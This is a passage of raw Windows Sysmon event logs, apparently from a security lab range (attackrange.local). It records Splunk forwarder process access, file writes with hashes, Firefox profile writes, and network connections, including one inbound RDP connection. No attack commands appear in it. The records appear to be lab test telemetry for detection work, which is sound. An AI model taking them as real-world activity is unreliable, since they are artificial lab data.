Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.064{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D75408A11D6C01ECD6AB53B9FAF3372,SHA256=ED3A8F79983EAB255FF9D534A09A71CEC59C3AF0ED5BA373C8114521C44B0474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:55.457{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDA778800BEBD16FBE8852D15D94D1E,SHA256=8F61B7A8870599ABC46186BFD8791131174BB19166A664257A6F838E790C5A1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:55.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A1000C0329D314D3C8B8C83CB2484B1,SHA256=496FDFC9C02DDD7A5B2F15A352AE8E4E323D82288917B75920724D2C33075EBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:55.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0C3BD956ED2A9CA7FB58E70EB68195,SHA256=825F40F095171C783CDC39221215C280CB352B4F04B692657D54CDBBFC933B11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:56.472{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F264AF1DE2C6FDBAF8515150C95DFD70,SHA256=E5D53B2035CE818DB16FA0C8B8F023BFCFFECF3A28F9A5BF9FAF3430BA52F262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:56.793{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:56.077{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B336FFDF9BEEA19BE5D60D263E213242,SHA256=58FAE8E6B46FF78C3E96AEF83D31FB38A58D0ED151732706355394A16CDE9391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:57.488{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77DB1050FC6A9B151467482607ED8DFC,SHA256=C37B3318CB60CF98FF64E9A247D75D6367639E294740512EFFB61946E1655DEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D08BF5BB5F7335E3200E83EF2ADE792F,SHA256=DED845FEBD2997A642FACCDBB9D36FDA5A381F6C3FF94039609DFA1B96045BFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4E9B529A37BAC5BCB56818457EF14B54,SHA256=5FD4E2FABF3C59B2DA1E2669C765D73027F09417FB1228CED69A0FE80E3EE02A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F945381C2FB157A3FA8CF2411BFC2C47,SHA256=898A8B21D644FE0BB9E3D491A6A1D03AF5B013029AC3402ADF0921494C4789A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE6C0F0092AC2C5E5F5DF585B1C1F233,SHA256=B4F36F2FFC56F5DBE21B222A5F60A8B58BB614527A7B1C38391DDC9A3606949A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=787D999BB7CE86B4636B02329960392F,SHA256=FE1E617447BE2C7E27FB553BD5AA6B9C2F9D310C2984E4956818A675EA485B75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CD2214D562DEC8F9C005B26E97875F6A,SHA256=AEF2F440A274009C71EE22BE97FBB5456885D9D00F8B03CF1D268A7752204624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9ABAE90EFF1967C18ED7E310D711EE07,SHA256=E48FC511507FE93478838BF95D37A4ACDF3DDFEB22D829F9A92F434D14113BF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1457D11788E5E9FC5E01A87BB2FFF1DB,SHA256=A9DE5F9DAA538088A8F89EE76B2F78B69DFA2BE570222918959F87EE538AA2EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=978C31FB712D76624D8912657CF00D13,SHA256=B223A2A097333FE954E8362EDD3C2F94AE300A19E9739A0E2269B8BBA20D7D9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C67C6BA37DA7E2D12753CB4A77723425,SHA256=D318E8DFC5D9166ABE6A9F2C526010B5AC472121A42653B6C1B91B126F0A73BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E6697A2651489C9534066B544B49FC04,SHA256=B6FDD947FC21829475F9F636CC6C590C213B9DD0FCD849B2EB96FDD7B4CF6F40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.108{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD6AE77E695E3DC66943038EFF273B4E,SHA256=B0328EE64E13A20E665D32CC0A0D19399EB63384F13DFCFF3996E96949EDEEC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:58.489{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E72418D94B4090CE1AF15C4B61D11B9,SHA256=697CF75903E31098FC8C1D601201FD1C1EE194F1355744D3F520174D8A69C1A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:50.331{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50933-false10.0.1.12-8089- 23542300x80000000000000001046639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:58.108{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B672C6BE12C7825F034BE305D3761842,SHA256=90BEE45AC21800C3EF3F0559B0F5B75F82D04FC272F5C9EB1E5EAB8C1B099C79,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:57.293{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57178-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.504{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B27341BC61502197582D95ECDBF6EF,SHA256=16E9DD6DBCABC09E1D242276BBA9176E6A31F728F6D20F637ABF6EA167C445BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:57.752{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-25924-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001046642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.630{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50934-false10.0.1.12-8000- 23542300x80000000000000001046641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:59.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80969C9AAC40FD81D3ACA6C4913FE959,SHA256=2D793D43FAC5F71D648B8EBFDA1C36B8D717D9722668F328811C8FA5FEF986A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D035EC751D7D14925E9694156767BD8,SHA256=4B9ECBEA49D6FB034781680021D45D842E66B785E287032A202F8BBABC71D40A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB2E255D74A76241598EAF3067116344,SHA256=03620E4F0E7B6ED300D5E9B7C13EC74A2EB5F354492B5531AF9C1B17406449A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:00.520{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C79AD9AD3BBFC1FFC59C27C804414CFA,SHA256=2B589042B982C35A8A0EBECF7D9F72BB284830FF154BF288B0FB7871877BF30E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:00.144{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707E970A4375B2728B9894F84683B50D,SHA256=1DA8C011511956A2F3D4DD1CD51AA80A094165C8392735769C51641BAAE0E639,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:01.614{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37C174374A66EC1599A9D38D5F31227A,SHA256=8ADA828E16E323B846EF9CD35BAAA8C315449ACDBF8066F415CDCC0B46308CCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:01.175{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18343043D509CDE01714D078654B4D08,SHA256=95B22A7B403C4C2094BE378CED6F9BBA712BE625C83CFB4AA5149A03D8CA5785,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.370{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57182-false169.254.169.254instance-data.eu-central-1.compute.internal80http 354300x8000000000000000806403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.290{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57181-false169.254.169.254instance-data.eu-central-1.compute.internal80http 354300x8000000000000000806402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.233{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57180-false169.254.169.254instance-data.eu-central-1.compute.internal80http 354300x8000000000000000806401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.232{0C1E0330-0492-60E8-3400-00000000D001}2152C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57179-false169.254.169.254instance-data.eu-central-1.compute.internal80http 23542300x8000000000000000806400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:01.207{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D035EC751D7D14925E9694156767BD8,SHA256=4B9ECBEA49D6FB034781680021D45D842E66B785E287032A202F8BBABC71D40A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:02.629{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46237DB26E0659A2EB47B6F73E03F9FC,SHA256=C7D35973F6E08702D7CF5DC92A445270EEBDB4DEFD90A7B1BFB611CB04886416,IMPHASH=00000000000000000000000000000000falsetrue 